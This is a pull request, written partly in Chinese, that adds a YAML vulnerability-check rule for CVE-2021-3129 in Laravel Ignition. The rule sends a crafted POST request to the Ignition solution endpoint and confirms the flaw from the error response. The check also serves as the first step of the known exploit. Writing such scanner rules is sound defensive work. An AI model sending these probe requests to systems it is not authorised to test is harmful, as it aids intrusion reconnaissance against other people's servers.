### PR TITLE
Create laravel-Ignition-rce-cve-2021-3129.yml

### DIFF
--- a/pocs/laravel-Ignition-rce-cve-2021-3129.yml
+++ b/pocs/laravel-Ignition-rce-cve-2021-3129.yml
@@ -1,0 +1,19 @@
+name: poc-yaml-laravel-Ignition-rce-cve-2021-3129
+rules:
+  - method: POST
+    path: /_ignition/execute-solution
+    follow_redirects: false
+    headers:
+      Content-Type: application/json
+    body: >-
+      {
+        "solution":"Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
+        "parameters":{"variableName":"username","viewFile":"xxxx"}
+      }
+    expression: >
+      response.status == 500 && response.body.bcontains(b'file_get_contents(xxxx)')
+detail:
+  author: HWHXY
+  links:
+    - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
+    - https://mp.weixin.qq.com/s/k08P2Uij_4ds35FxE2eh0g


### PR DESCRIPTION

## 本 poc 是检测什么漏洞的
Laravel Ignition 2.5.1 代码执行漏洞（CVE-2021-3129）
## 测试环境
https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
## 备注
无